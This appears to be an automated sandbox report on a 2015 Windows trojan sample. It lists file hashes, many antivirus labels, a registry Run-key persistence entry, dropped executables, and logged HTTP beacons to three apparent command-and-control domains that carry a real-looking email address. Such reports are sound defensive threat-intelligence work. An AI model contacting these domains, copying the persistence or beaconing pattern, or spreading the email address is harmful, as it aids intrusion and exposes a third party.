Analysis Date: 2015-08-27 10:23:06
MD5: 71dd4acc4a1ca2755de4c93bd88e4458
SHA1: f6b3521206b4fa755c2c06dfebd01a66c9f12baa

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 563e2bcad0adcf8e811743c7bf836324 sha1: b6591be8752294105988fab4b06f0392fa44e4ae size: 303104
Section .rdata: md5: a1bfcc063e34b20570ecebf4aadc8ea9 sha1: 0323c565f34d331157610d3cc59a56e3072c645c size: 34304
Section .data: md5: e90e9bc02ef8cfab0a58245fcd71f1fc sha1: acd103891afcee40fdfd6ba6c0386115e11a4860 size: 99328
Timestamp: 2015-01-29 10:21:39
Packer: Microsoft Visual C++ ?.?
PEhash: 2898c195e0acb9f3549777c90eb7780927d69018
IMPhash: d4e563ea85ff6315f4e7724bce630fd2
AV Rising: no_virus
AV Mcafee: Trojan-FEMT!71DD4ACC4A1C
AV Avira (antivir): TR/ATRAPS.Gen2
AV Twister: Trojan.Agent.VNC.aanx.mg
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Eset (nod32): Win32/Agent.VNC
AV Grisoft (avg): Win32/Cryptor
AV Symantec: Downloader.Upatre!g15
AV Fortinet: W32/Agent.VNC!tr
AV BitDefender: Gen:Variant.Symmi.22722
AV K7: Trojan ( 004cb2771 )
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.Z
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV MalwareBytes: Trojan.Zbot.WHE
AV Authentium: W32/Wonton.B.gen!Eldorado
AV Frisk (f-prot): no_virus
AV Ikarus: no_virus
AV Emsisoft: Gen:Variant.Symmi.22722
AV Zillya!: no_virus
AV Kaspersky: Trojan.Win32.Generic
AV Trend Micro: TSPY_NIVDORT.SMB
AV CAT (quickheal): Trojan.Dynamer.AC3
AV VirusBlokAda (vba32): no_virus
AV Padvish: no_virus
AV BullGuard: Gen:Variant.Symmi.22722
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader15.48275
AV F-Secure: Gen:Variant.Symmi.22722
AV CA (E-Trust Ino): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AutoConnect Link Source Enumerator Diagnostic ➝ C:\Documents and Settings\Administrator\Application Data\gszjxycbyvxzal\enebdwd.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\gszjxycbyvxzal\enebdwd.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\gszjxycbyvxzal\enebdwd.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\gszjxycbyvxzal\enebdwd.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\gszjxycbyvxzal\enebdwd.xk
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\gszjxycbyvxzal\mbcdkzsaed.exe
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\gszjxycbyvxzal\enebdwd.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\gszjxycbyvxzal\enebdwd.exe"

Network Details:

HTTP GET: http://finishperiod.net/index.php?email=backoffice@confidentinvest.ro&method=post&len
User-Agent:
HTTP GET: http://severadifference.net/index.php?email=backoffice@confidentinvest.ro&method=post&len
User-Agent:
HTTP GET: http://simpledifference.net/index.php?email=backoffice@confidentinvest.ro&method=post&len
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 50.63.202.32:80
Flows TCP: 192.168.1.1:1032 ➝ 95.211.230.75:80
Flows TCP: 192.168.1.1:1033 ➝ 31.22.4.18:80

Raw Pcap

Strings